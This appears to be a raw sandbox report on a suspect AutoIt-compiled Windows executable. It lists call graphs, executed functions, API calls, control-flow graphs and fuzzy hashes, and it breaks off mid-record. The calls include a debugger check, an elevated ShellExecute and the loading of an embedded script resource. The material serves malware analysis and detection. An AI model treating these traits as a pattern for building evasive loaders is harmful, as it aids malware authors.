95244->95239 95244->95241 95244->95242 95244->95243 95245 7ff7adc15360 300 API calls Concurrency::wait 95244->95245 95249 7ff7adc834e4 77 API calls 3 library calls 95244->95249 95245->95244 95246->95218 95247->95222 95248->95244 95249->95244 95250->95228 95251 7ff7adc290e0 95258 7ff7adc3af30 95251->95258 95253 7ff7adc290e5 95254 7ff7adc3ba10 _isindst LeaveCriticalSection 95253->95254 95255 7ff7adc290f0 95254->95255 95256 7ff7adc290fc 95255->95256 95257 7ff7adc29118 11 API calls 95255->95257 95257->95256 95263 7ff7adc3b778 GetLastError 95258->95263 95260 7ff7adc3af3b 95284 7ff7adc3b26c 35 API calls abort 95260->95284 95264 7ff7adc3b7a2 95263->95264 95265 7ff7adc3b795 95263->95265 95286 7ff7adc3dda8 15 API calls 2 library calls 95264->95286 95285 7ff7adc3bd6c 6 API calls __crtLCMapStringW 95265->95285 95268 7ff7adc3b79a 95268->95264 95269 7ff7adc3b7e3 95268->95269 95272 7ff7adc3b7e8 SetLastError 95269->95272 95273 7ff7adc3b7fe SetLastError 95269->95273 95270 7ff7adc3b7b9 95276 7ff7adc3b3c0 __free_lconv_num 15 API calls 95270->95276 95271 7ff7adc3b7b1 95271->95270 95287 7ff7adc3bdc4 6 API calls __crtLCMapStringW 95271->95287 95272->95260 95289 7ff7adc3b26c 35 API calls abort 95273->95289 95279 7ff7adc3b7c0 95276->95279 95277 7ff7adc3b7d0 95277->95270 95280 7ff7adc3b7d7 95277->95280 95279->95273 95288 7ff7adc3b528 15 API calls _invalid_parameter_noinfo 95280->95288 95282 7ff7adc3b7dc 95283 7ff7adc3b3c0 __free_lconv_num 15 API calls 95282->95283 95283->95269 95285->95268 95286->95271 95287->95277 95288->95282 95290 7ff7adc3a2c4 95291 7ff7adc3a2dd 95290->95291 95297 7ff7adc3a2d9 95290->95297 95300 7ff7adc43e9c GetEnvironmentStringsW 95291->95300 95294 7ff7adc3a2ea 95296 7ff7adc3b3c0 __free_lconv_num 15 API calls 95294->95296 95296->95297 95298 7ff7adc3a2f7 95299 7ff7adc3b3c0 __free_lconv_num 15 API calls 95298->95299 95299->95294 95301 7ff7adc3a2e2 95300->95301 95303 7ff7adc43ec0 95300->95303 95301->95294 95307 7ff7adc3a428 31 API calls 2 library calls 95301->95307 95308 7ff7adc3c51c 95303->95308 95304 7ff7adc43ef2 memcpy_s 95305 7ff7adc3b3c0 __free_lconv_num 15 API calls 95304->95305 95306 7ff7adc43f12 FreeEnvironmentStringsW 95305->95306 95306->95301 95307->95298 95309 7ff7adc3c567 95308->95309 95313 7ff7adc3c52b fread_s 95308->95313 95316 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 95309->95316 95311 7ff7adc3c54e HeapAlloc 95312 7ff7adc3c565 95311->95312 95311->95313 95312->95304 95313->95309 95313->95311 95315 7ff7adc2925c EnterCriticalSection LeaveCriticalSection fread_s 95313->95315 95315->95313 95316->95312 95317 7ff7adc5b221 95318 7ff7adc5b22a 95317->95318 95325 7ff7adc10378 95317->95325 95340 7ff7adc747bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95318->95340 95320 7ff7adc5b241 95341 7ff7adc74708 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95320->95341 95322 7ff7adc5b264 95323 7ff7adc13c20 300 API calls 95322->95323 95324 7ff7adc5b292 95323->95324 95332 7ff7adc10405 95324->95332 95342 7ff7adc98d98 49 API calls Concurrency::wait 95324->95342 95334 7ff7adc0f7b8 95325->95334 95328 7ff7adc5b2d9 Concurrency::wait 95328->95325 95343 7ff7adc747bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95328->95343 95330 7ff7adc0e0a8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95330->95332 95332->95330 95333 7ff7adc1070a 95332->95333 95344 7ff7adc0ee20 5 API calls Concurrency::wait 95332->95344 95336 7ff7adc0f7d5 95334->95336 95335 7ff7adc0f7de 95335->95332 95336->95335 95337 7ff7adc09640 4 API calls 95336->95337 95338 7ff7adc0e0a8 4 API calls 95336->95338 95339 7ff7adc0f7b8 4 API calls 95336->95339 95337->95336 95338->95336 95339->95336 95340->95320 95341->95322 95342->95328 95343->95328 95344->95332

                                                                          Executed Functions

                                                                          Function 00007FF7ADC037B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 145windowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7ADC03785), ref: 00007FF7ADC037F2
                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF7ADC03785), ref: 00007FF7ADC03807
                                                                          • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF7ADC03785), ref: 00007FF7ADC0388D
                                                                            • Part of subcall function 00007FF7ADC03F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF7ADC038BF,?,?,?,?,?,00007FF7ADC03785), ref: 00007FF7ADC03FFD
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7ADC03785), ref: 00007FF7ADC03924
                                                                          • MessageBoxA.USER32 ref: 00007FF7ADC4B888
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7ADC03785), ref: 00007FF7ADC4B8E1
                                                                          • GetForegroundWindow.USER32(?,?,?,?,?,00007FF7ADC03785), ref: 00007FF7ADC4B968
                                                                          • ShellExecuteW.SHELL32 ref: 00007FF7ADC4B98F
                                                                            • Part of subcall function 00007FF7ADC03B84: GetSysColorBrush.USER32 ref: 00007FF7ADC03B9E
                                                                            • Part of subcall function 00007FF7ADC03B84: LoadCursorW.USER32 ref: 00007FF7ADC03BAE
                                                                            • Part of subcall function 00007FF7ADC03B84: LoadIconW.USER32 ref: 00007FF7ADC03BC3
                                                                            • Part of subcall function 00007FF7ADC03B84: LoadIconW.USER32 ref: 00007FF7ADC03BDC
                                                                            • Part of subcall function 00007FF7ADC03B84: LoadIconW.USER32 ref: 00007FF7ADC03BF5
                                                                            • Part of subcall function 00007FF7ADC03B84: LoadImageW.USER32 ref: 00007FF7ADC03C21
                                                                            • Part of subcall function 00007FF7ADC03B84: RegisterClassExW.USER32 ref: 00007FF7ADC03C85
                                                                            • Part of subcall function 00007FF7ADC03CBC: CreateWindowExW.USER32 ref: 00007FF7ADC03D0C
                                                                            • Part of subcall function 00007FF7ADC03CBC: CreateWindowExW.USER32 ref: 00007FF7ADC03D5F
                                                                            • Part of subcall function 00007FF7ADC03CBC: ShowWindow.USER32 ref: 00007FF7ADC03D75
                                                                            • Part of subcall function 00007FF7ADC06258: Shell_NotifyIconW.SHELL32 ref: 00007FF7ADC06350
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                                          • String ID: This is a third-party compiled AutoIt script.$runas
                                                                          • API String ID: 1593035822-3287110873
                                                                          • Opcode ID: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                                          • Instruction ID: 8eb2ebf0ca544e44f3e6b2b4721638257c4dd4454212f152dc60643ca69cce01
                                                                          • Opcode Fuzzy Hash: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                                          • Instruction Fuzzy Hash: 22713B62A1F6839DEA20BB60E8541F9E761FF45754FC20136D54D462B6FE2CEA0BC320
                                                                          Function 00007FF7ADC06580 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 208COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 352 7ff7adc06580-7ff7adc065fc call 7ff7adc24c68 call 7ff7adc06c98 call 7ff7adc25d00 359 7ff7adc06602-7ff7adc06606 352->359 360 7ff7adc06737-7ff7adc0673a 352->360 361 7ff7adc4ca03-7ff7adc4ca1e 359->361 362 7ff7adc0660c-7ff7adc06617 call 7ff7adc35514 359->362 363 7ff7adc06740-7ff7adc06753 CreateStreamOnHGlobal 360->363 364 7ff7adc4c9f5-7ff7adc4c9fd call 7ff7adc82e00 360->364 375 7ff7adc4ca27-7ff7adc4ca60 call 7ff7adc06810 call 7ff7adc067d8 361->375 373 7ff7adc0661b-7ff7adc0664e call 7ff7adc067d8 362->373 363->359 367 7ff7adc06759-7ff7adc06777 FindResourceExW 363->367 364->361 367->359 371 7ff7adc0677d 367->371 372 7ff7adc4c97e-7ff7adc4c991 LoadResource 371->372 372->359 376 7ff7adc4c997-7ff7adc4c9a8 SizeofResource 372->376 380 7ff7adc06654-7ff7adc0665f 373->380 381 7ff7adc066e8 373->381 384 7ff7adc066ee 375->384 394 7ff7adc4ca66 375->394 376->359 379 7ff7adc4c9ae-7ff7adc4c9ba LockResource 376->379 379->359 383 7ff7adc4c9c0-7ff7adc4c9f0 379->383 385 7ff7adc06661-7ff7adc0666f 380->385 386 7ff7adc066ae-7ff7adc066b2 380->386 381->384 383->359 390 7ff7adc066f1-7ff7adc06715 384->390 391 7ff7adc06670-7ff7adc0667d 385->391 386->381 392 7ff7adc066b4-7ff7adc066cf call 7ff7adc06810 386->392 395 7ff7adc06729-7ff7adc06736 390->395 396 7ff7adc06717-7ff7adc06724 call 7ff7adc24c24 * 2 390->396 397 7ff7adc06680-7ff7adc0668f 391->397 392->373 394->390 396->395 401 7ff7adc066d4-7ff7adc066dd 397->401 402 7ff7adc06691-7ff7adc06695 397->402 403 7ff7adc066e3-7ff7adc066e6 401->403 404 7ff7adc06782-7ff7adc0678c 401->404 402->375 406 7ff7adc0669b-7ff7adc066a8 402->406 403->402 407 7ff7adc0678e 404->407 408 7ff7adc06797-7ff7adc067a1 404->408 406->391 410 7ff7adc066aa 406->410 407->408 411 7ff7adc067a3-7ff7adc067ad 408->411 412 7ff7adc067ce 408->412 410->386 413 7ff7adc067c6 411->413 414 7ff7adc067af-7ff7adc067bb 411->414 412->372 413->412 414->397 415 7ff7adc067c1 414->415 415->413
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                          • String ID: AU3!$EA06$SCRIPT
                                                                          • API String ID: 3051347437-2925976212
                                                                          • Opcode ID: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
                                                                          • Instruction ID: d0386783e62ed110d15af014520d46937ff2da5166b5c17ac9a792a1100e4f9c
                                                                          • Opcode Fuzzy Hash: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
                                                                          • Instruction Fuzzy Hash: 12910272B0E6418AEB20AF65D448A7DA7A4FB45B84FC20135DE6D477A1EF38E406C720
                                                                          Function 00007FF7ADC21D80 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 482 7ff7adc21d80-7ff7adc21e17 call 7ff7adc09640 GetVersionExW call 7ff7adc07cf4 487 7ff7adc21e1d 482->487 488 7ff7adc69450 482->488 490 7ff7adc21e20-7ff7adc21e46 call 7ff7adc0dda4 487->490 489 7ff7adc69457-7ff7adc6945d 488->489 491 7ff7adc69463-7ff7adc69480 489->491 495 7ff7adc21e4c 490->495 496 7ff7adc21fc1 490->496 491->491 493 7ff7adc69482-7ff7adc69485 491->493 493->490 497 7ff7adc6948b-7ff7adc69491 493->497 498 7ff7adc21e53-7ff7adc21e59 495->498 496->488 497->489 499 7ff7adc69493 497->499 500 7ff7adc21e5f-7ff7adc21e7c 498->500 502 7ff7adc69498-7ff7adc694a1 499->502 500->500 501 7ff7adc21e7e-7ff7adc21e81 500->501 501->502 503 7ff7adc21e87-7ff7adc21ed6 call 7ff7adc0dda4 501->503 502->498 504 7ff7adc694a7 502->504 507 7ff7adc21edc-7ff7adc21ede 503->507 508 7ff7adc69645-7ff7adc6964d 503->508 504->496 511 7ff7adc694ac-7ff7adc694af 507->511 512 7ff7adc21ee4-7ff7adc21efa 507->512 509 7ff7adc6965a-7ff7adc6965d 508->509 510 7ff7adc6964f-7ff7adc69658 508->510 513 7ff7adc69686-7ff7adc69692 509->513 514 7ff7adc6965f-7ff7adc69674 509->514 510->513 517 7ff7adc21f3c-7ff7adc21f80 GetCurrentProcess IsWow64Process call 7ff7adc26240 511->517 518 7ff7adc694b5-7ff7adc69501 511->518 515 7ff7adc21f00-7ff7adc21f02 512->515 516 7ff7adc69572-7ff7adc69579 512->516 529 7ff7adc6969d-7ff7adc696b3 call 7ff7adc732f4 513->529 519 7ff7adc69676-7ff7adc6967d 514->519 520 7ff7adc6967f 514->520 523 7ff7adc21f08-7ff7adc21f0b 515->523 524 7ff7adc6959e-7ff7adc695b3 515->524 521 7ff7adc6957b-7ff7adc69584 516->521 522 7ff7adc69589-7ff7adc69599 516->522 517->529 536 7ff7adc21f86-7ff7adc21f8b GetSystemInfo 517->536 518->517 526 7ff7adc69507-7ff7adc6950e 518->526 519->513 520->513 521->517 522->517 530 7ff7adc695ed-7ff7adc695f0 523->530 531 7ff7adc21f11-7ff7adc21f2d 523->531 532 7ff7adc695b5-7ff7adc695be 524->532 533 7ff7adc695c3-7ff7adc695d3 524->533 527 7ff7adc69534-7ff7adc6953c 526->527 528 7ff7adc69510-7ff7adc69518 526->528 539 7ff7adc6953e-7ff7adc69547 527->539 540 7ff7adc6954c-7ff7adc69554 527->540 537 7ff7adc6951a-7ff7adc69521 528->537 538 7ff7adc69526-7ff7adc6952f 528->538 550 7ff7adc696d7-7ff7adc696dc GetSystemInfo 529->550 551 7ff7adc696b5-7ff7adc696d5 call 7ff7adc732f4 529->551 530->517 535 7ff7adc695f6-7ff7adc69620 530->535 542 7ff7adc695d8-7ff7adc695e8 531->542 543 7ff7adc21f33 531->543 532->517 533->517 544 7ff7adc69622-7ff7adc6962b 535->544 545 7ff7adc69630-7ff7adc69640 535->545 546 7ff7adc21f91-7ff7adc21fc0 536->546 537->517 538->517 539->517 547 7ff7adc69556-7ff7adc6955f 540->547 548 7ff7adc69564-7ff7adc6956d 540->548 542->517 543->517 544->517 545->517 547->517 548->517 552 7ff7adc696e2-7ff7adc696ea 550->552 551->552 552->546 555 7ff7adc696f0-7ff7adc696f7 FreeLibrary 552->555 555->546
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentInfoSystemVersionWow64
                                                                          • String ID: |O
                                                                          • API String ID: 1568231622-607156228
                                                                          • Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                          • Instruction ID: 21573b72a25c678a5f933ccead237185149536cd4033c3ae9f6ab2d1d1e12938
                                                                          • Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                          • Instruction Fuzzy Hash: 4AD16F12A1F3C29DE661AB54E8202F5EB60EF19B84FC60035D54D03675FE6CA947D731
                                                                          Function 00007FF7ADC9F630 Relevance: 12.4, APIs: 8, Instructions: 350processCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 719 7ff7adc9f630-7ff7adc9f69e call 7ff7adc26240 722 7ff7adc9f6a0-7ff7adc9f6b8 call 7ff7adc0ffbc 719->722 723 7ff7adc9f6d4-7ff7adc9f6d9 719->723 731 7ff7adc9f708-7ff7adc9f70d 722->731 732 7ff7adc9f6ba-7ff7adc9f6d2 call 7ff7adc0ffbc 722->732 724 7ff7adc9f6db-7ff7adc9f6ef call 7ff7adc0ffbc 723->724 725 7ff7adc9f71e-7ff7adc9f723 723->725 739 7ff7adc9f6f3-7ff7adc9f706 call 7ff7adc0ffbc 724->739 728 7ff7adc9f736-7ff7adc9f75c call 7ff7adc0d4cc call 7ff7adc0e330 725->728 729 7ff7adc9f725-7ff7adc9f729 725->729 748 7ff7adc9f840-7ff7adc9f84a 728->748 749 7ff7adc9f762-7ff7adc9f7cf call 7ff7adc0d4cc call 7ff7adc0e330 call 7ff7adc0d4cc call 7ff7adc0e330 call 7ff7adc0d4cc call 7ff7adc0e330 728->749 735 7ff7adc9f72d-7ff7adc9f732 call 7ff7adc0ffbc 729->735 740 7ff7adc9f70f-7ff7adc9f717 731->740 741 7ff7adc9f719-7ff7adc9f71c 731->741 732->739 735->728 739->725 739->731 740->735 741->725 741->728 750 7ff7adc9f84c-7ff7adc9f86e call 7ff7adc0d4cc call 7ff7adc0e330 748->750 751 7ff7adc9f87d-7ff7adc9f8af GetCurrentDirectoryW call 7ff7adc24c68 GetCurrentDirectoryW 748->751 798 7ff7adc9f7d1-7ff7adc9f7f3 call 7ff7adc0d4cc call 7ff7adc0e330 749->798 799 7ff7adc9f806-7ff7adc9f83e GetSystemDirectoryW call 7ff7adc24c68 GetSystemDirectoryW 749->799 750->751 767 7ff7adc9f870-7ff7adc9f87b call 7ff7adc28d58 750->767 760 7ff7adc9f8b5-7ff7adc9f8b8 751->760 763 7ff7adc9f8f0-7ff7adc9f8ff call 7ff7adc7f464 760->763 764 7ff7adc9f8ba-7ff7adc9f8eb call 7ff7adc1f688 * 3 760->764 774 7ff7adc9f901-7ff7adc9f903 763->774 775 7ff7adc9f905-7ff7adc9f95d call 7ff7adc7fddc call 7ff7adc7fca8 call 7ff7adc7fafc 763->775 764->763 767->751 767->763 781 7ff7adc9f964-7ff7adc9f96c 774->781 775->781 809 7ff7adc9f95f 775->809 786 7ff7adc9fa0f-7ff7adc9fa4b CreateProcessW 781->786 787 7ff7adc9f972-7ff7adc9fa0d call 7ff7adc6d1f8 call 7ff7adc28d58 * 3 call 7ff7adc24c24 * 3 781->787 791 7ff7adc9fa4f-7ff7adc9fa62 call 7ff7adc24c24 * 2 786->791 787->791 811 7ff7adc9fa64-7ff7adc9fabc call 7ff7adc04afc * 2 GetLastError call 7ff7adc1f214 call 7ff7adc113e0 791->811 812 7ff7adc9fabe-7ff7adc9faca CloseHandle 791->812 798->799 824 7ff7adc9f7f5-7ff7adc9f800 call 7ff7adc28d58 798->824 799->760 809->781 827 7ff7adc9fb3b-7ff7adc9fb65 call 7ff7adc7f51c 811->827 818 7ff7adc9faf5-7ff7adc9fafc 812->818 819 7ff7adc9facc-7ff7adc9faf0 call 7ff7adc7f7dc call 7ff7adc80088 call 7ff7adc9fb68 812->819 820 7ff7adc9fb0c-7ff7adc9fb35 call 7ff7adc113e0 CloseHandle 818->820 821 7ff7adc9fafe-7ff7adc9fb0a 818->821 819->818 820->827 821->827 824->760 824->799
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Directory$Handle$CloseCurrentLockSyncSystem$CreateErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 1787492119-0
                                                                          • Opcode ID: b5529a047433c39029aa94f7abef1aaae7ba2a451b0d80efb392d77c1937dd44
                                                                          • Instruction ID: 641148fd2f43cd6df012bb00eb6b3dacb72110da0d97d777e2b9f68ee3580995
                                                                          • Opcode Fuzzy Hash: b5529a047433c39029aa94f7abef1aaae7ba2a451b0d80efb392d77c1937dd44
                                                                          • Instruction Fuzzy Hash: 34E19122B0DB418AEB14EF26D8502BDA7A1FB84B84FC14535EE5D477A9EF38E446C710
                                                                          Function 00007FF7ADC7C7C0 Relevance: 6.0, APIs: 4, Instructions: 24filestringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                          • String ID:
                                                                          • API String ID: 2695905019-0
                                                                          • Opcode ID: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                          • Instruction ID: 66ab5d439af5312331d36911590a8ef8acad36c8086180822ce87bcfaebd709e
                                                                          • Opcode Fuzzy Hash: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                          • Instruction Fuzzy Hash: 9EF05E10E1E60786EB246B24B808378A260EF41BB5FD54730D47E062F4EF6CD49A4A10
                                                                          Function 00007FF7ADC07920 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 178registryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                                          • API String ID: 2667193904-1575078665
                                                                          • Opcode ID: e4a1d1e4efa0bc87a7461a6a39f11fb0c9c767336ce2d992286509dae00062b4
                                                                          • Instruction ID: 37fb839e569b5833edc7f29974be67ca9f8fee827be23b7ca02b184e35344132
                                                                          • Opcode Fuzzy Hash: e4a1d1e4efa0bc87a7461a6a39f11fb0c9c767336ce2d992286509dae00062b4
                                                                          • Instruction Fuzzy Hash: D9913C22A1EB4299EB10BB24E8501F9E364FF84754FC21132E94D46AB5FF7CD646C760
                                                                          Function 00007FF7ADC05DEC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 143windowtimeregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 131 7ff7adc05dec-7ff7adc05e21 133 7ff7adc05e23-7ff7adc05e26 131->133 134 7ff7adc05e91-7ff7adc05e94 131->134 136 7ff7adc05e98 133->136 137 7ff7adc05e28-7ff7adc05e2f 133->137 134->133 135 7ff7adc05e96 134->135 138 7ff7adc05e6b-7ff7adc05e76 DefWindowProcW 135->138 139 7ff7adc4c229-7ff7adc4c261 call 7ff7adc1ede4 call 7ff7adc22c44 136->139 140 7ff7adc05e9e-7ff7adc05ea3 136->140 141 7ff7adc05e35-7ff7adc05e3a 137->141 142 7ff7adc05f21-7ff7adc05f29 PostQuitMessage 137->142 149 7ff7adc05e7c-7ff7adc05e90 138->149 178 7ff7adc4c267-7ff7adc4c26e 139->178 144 7ff7adc05ea5-7ff7adc05ea8 140->144 145 7ff7adc05ecc-7ff7adc05efa SetTimer RegisterWindowMessageW 140->145 146 7ff7adc05e40-7ff7adc05e43 141->146 147 7ff7adc4c2af-7ff7adc4c2c5 call 7ff7adc7a40c 141->147 143 7ff7adc05ec8-7ff7adc05eca 142->143 143->149 150 7ff7adc4c1b8-7ff7adc4c1bb 144->150 151 7ff7adc05eae-7ff7adc05ebe KillTimer call 7ff7adc05d88 144->151 145->143 152 7ff7adc05efc-7ff7adc05f09 CreatePopupMenu 145->152 153 7ff7adc05f2b-7ff7adc05f35 call 7ff7adc24610 146->153 154 7ff7adc05e49-7ff7adc05e4e 146->154 147->143 172 7ff7adc4c2cb 147->172 158 7ff7adc4c1bd-7ff7adc4c1c0 150->158 159 7ff7adc4c1f7-7ff7adc4c224 MoveWindow 150->159 168 7ff7adc05ec3 call 7ff7adc07098 151->168 152->143 165 7ff7adc05f3a 153->165 161 7ff7adc05e54-7ff7adc05e59 154->161 162 7ff7adc4c292-7ff7adc4c299 154->162 166 7ff7adc4c1e4-7ff7adc4c1f2 SetFocus 158->166 167 7ff7adc4c1c2-7ff7adc4c1c5 158->167 159->143 170 7ff7adc05e5f-7ff7adc05e65 161->170 171 7ff7adc05f0b-7ff7adc05f1f call 7ff7adc05f3c 161->171 162->138 169 7ff7adc4c29f-7ff7adc4c2aa call 7ff7adc6c54c 162->169 165->143 166->143 167->170 174 7ff7adc4c1cb-7ff7adc4c1df call 7ff7adc1ede4 167->174 168->143 169->138 170->138 170->178 171->143 172->138 174->143 178->138 179 7ff7adc4c274-7ff7adc4c28d call 7ff7adc05d88 call 7ff7adc06258 178->179 179->138
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
